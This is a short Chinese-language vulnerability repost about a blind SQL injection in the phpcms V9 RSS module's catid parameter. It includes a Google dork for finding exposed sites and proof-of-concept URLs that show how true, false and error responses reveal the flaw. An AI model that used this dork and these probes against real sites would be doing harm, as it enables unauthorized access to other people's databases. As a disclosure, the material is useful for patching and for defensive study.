phpcms V9 BLind SQL 注入漏洞0day
phpcms V9 BLind SQL 注入漏洞0day
发布时间:2016-12-21 来源:查字典编辑
摘要:影响版本:phpcmsv9blind官方网站:http://www.phpcms.cn漏洞类型:SQL注入漏洞描述:phpcmsv9blin...

影响版本:phpcms v9 blind

官方网站:http://www.phpcms.cn

漏洞类型:SQL注入

漏洞描述:phpcms v9 blind 参数过滤存在SQL注入漏洞。

google dork:inurl:"index.php?m=content+c=rss+catid=10"

exploit & p0c

[!] index.php?m=content&c=rss&catid=[valid catid]

Example p0c

[!] http://host/index.php?m=content&c=rss&catid=10 <= True

[!] http://host/index.php?m=content&c=rss&catid=-10 <= False

[+] http://host/index.php?m=content&c=rss&catid=5 <= show MySQL Error (table)

推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
相关阅读
网友关注
最新漏洞分析学习
热门漏洞分析学习
网络安全子分类